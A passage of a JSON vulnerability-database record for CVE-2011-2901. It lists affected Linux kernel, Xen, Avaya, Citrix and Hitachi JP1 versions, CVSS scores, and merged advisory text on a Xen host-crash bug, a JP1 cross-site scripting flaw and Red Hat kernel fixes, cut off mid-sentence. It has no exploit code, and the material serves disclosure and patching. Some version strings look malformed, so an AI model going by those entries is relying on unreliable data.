        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "conferencing standard edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "hat enterprise linux eus 5.6.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "red",
        "version": null
      },
      {
        "model": "aura session manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.33-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "xenserver sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel 2.6.36-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.34-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.28-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system platform sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel 2.6.35-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.3"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.2"
      },
      {
        "model": "hat enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel 2.6.34-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel 2.6.29-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "kernel 2.6.32-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "kernel 2.6.38-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.1"
      },
      {
        "model": "xenserver feature pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel 2.6.37rc",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "communication server 1000e signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel 2.6.28-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "xenserver update",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.03"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "jp1/it service level management manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "-09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10-03"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-10"
      },
      {
        "model": "jp1/it service level management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-51"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-50-02"
      },
      {
        "model": "jp1/it resource management-manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hitachi",
        "version": "09-11-05"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "49370"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:xen:xen:3.1.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hitachi",
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2011-2901",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 5.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 5.1,
            "id": "CVE-2011-2901",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.8,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2011-2901",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201108-539",
            "trust": 0.6,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005246"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2901"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-539"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Off-by-one error in the __addr_ok macro in Xen 3.3 and earlier allows local 64 bit PV guest administrators to cause a denial of service (host crash) via unspecified hypercalls that ignore virtual-address bits. Xen is prone to a denial-of-service vulnerability due to an off-by-one error. \nAn attacker with access to a guest operating system can exploit this   issue to crash the host operating system, effectively denying service to  legitimate users. Due to the nature of this issue arbitrary code-execution maybe possible; however this has not been confirmed,. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following products are affected:\nJP1/IT Resource Management - Manager\nJP1/IT Service Level Management - Manager. \n\nThis update also fixes several bugs. Documentation for these bug fixes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux EUS (v. 5.6 server) - i386, ia64, noarch, ppc, s390x, x86_64\n\n3. Description:\n\nThese packages contain the Linux kernel. \n\nThis update fixes the following security issues:\n\n* A flaw in the Stream Control Transmission Protocol (SCTP) implementation\ncould allow a remote attacker to cause a denial of service by sending a\nspecially-crafted SCTP packet to a target system. (CVE-2011-2482,\nImportant)\n\nIf you do not run applications that use SCTP, you can prevent the sctp\nmodule from being loaded by adding the following to the end of the\n\"/etc/modprobe.d/blacklist.conf\" file:\n\nblacklist sctp\n\nThis way, the sctp module cannot be loaded accidentally, which may occur\nif an application that requires SCTP is started. A reboot is not necessary\nfor this change to take effect. \n\n* A flaw in the client-side NFS Lock Manager (NLM) implementation could\nallow a local, unprivileged user to cause a denial of service. \n(CVE-2011-2491, Important)\n\n* Flaws in the netlink-based wireless configuration interface could allow\na local user, who has the CAP_NET_ADMIN capability, to cause a denial of\nservice or escalate their privileges on systems that have an active\nwireless interface. (CVE-2011-2517, Important)\n\n* A flaw was found in the way the Linux kernel\u0027s Xen hypervisor\nimplementation emulated the SAHF instruction. When using a\nfully-virtualized guest on a host that does not use hardware assisted\npaging (HAP), such as those running CPUs that do not have support for (or\nthose that have it disabled) Intel Extended 